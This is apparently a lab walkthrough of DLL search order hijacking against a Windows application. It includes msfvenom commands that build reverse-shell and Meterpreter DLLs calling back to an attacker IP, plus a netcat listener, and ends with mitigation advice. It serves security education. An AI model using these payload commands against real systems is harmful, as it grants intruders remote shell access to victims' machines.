Overview

This technical walkthrough demonstrates DLL injection techniques in a controlled lab environment. The demonstration aims to illustrate the security implications of downloading and executing software from untrusted sources. Through practical examples, we’ll explore how malicious actors can leverage DLL search order hijacking to gain unauthorized system access.

DLL Search Order Fundamentals

Standard Search Order

Standard DLL Search Order

SafeDLLSearchMode Enabled

Safe DLL Search Mode

Lab Environment Setup

Components

  1. Target Application

  2. Virtual Machines

    • Windows 10 (Target System)
    • Kali Linux (Attack System)

DLL Hijacking Analysis

Process Monitor Configuration

  1. Launch Process Monitor as Administrator

  2. Configure filters for DLL monitoring: Process Monitor Configuration

  3. Verify clean monitoring state: Clean Process Monitor

Identifying Vulnerable DLLs

  1. Execute target application: Initial Execution Analysis

  2. Identified vulnerable DLL:

    • Target: kavremoverENU.dll
    • Characteristics: Non-crashing execution with minimal user impact Vulnerable DLL Identification

Exploitation Technique

Payload Generation

Basic Reverse Shell

# Generate reverse shell DLL
msfvenom -p windows/shell_reverse_tcp \
    LHOST=172.16.101.198 \
    LPORT=443 \
    EXITFUNC=thread \
    -f dll \
    -e x86/shikata_ga_nai \
    -o kavremoverENU.dll

Advanced Meterpreter Payload

# Generate Meterpreter DLL
msfvenom -p windows/meterpreter/reverse_tcp \
    LHOST=172.16.101.198 \
    LPORT=443 \
    -f dll \
    -o msi.dll
Payload Generation

Payload Deployment

  1. Copy malicious DLL to target directory: Payload Deployment

  2. Establish listener on attack system:

nc -lvnp 443
Listener Setup

Execution Analysis

  1. Initial Shell Access: Shell Access

  2. Process Monitor Analysis:

    • Observed rundll32.exe execution
    • Confirmed successful DLL injection Process Analysis

Alternative Injection Points

MSI DLL Hijacking

  • Target: msi.dll
  • Injection Point: Post-EULA acceptance
  • Advantage: More seamless user experience MSI DLL Hijacking

Security Implications

  1. Application Trust

    • Demonstrates risks of executing untrusted software
    • Highlights importance of code signing

  2. DLL Search Order

    • Shows vulnerability in Windows DLL loading mechanism
    • Emphasizes need for secure application deployment

  3. Defense Strategies

    • Use of SafeDLLSearchMode
    • Application directory security
    • System-wide DLL security policies

Mitigation Strategies

  1. Developer Recommendations

    • Use absolute paths for DLL loading
    • Implement DLL signature verification
    • Bundle required DLLs with application

  2. System Administrator Guidelines

    • Maintain strict folder permissions
    • Enable Windows Defender features
    • Monitor for suspicious DLL loading

  3. User Best Practices

    • Download from trusted sources
    • Verify application signatures
    • Monitor system behavior changes

References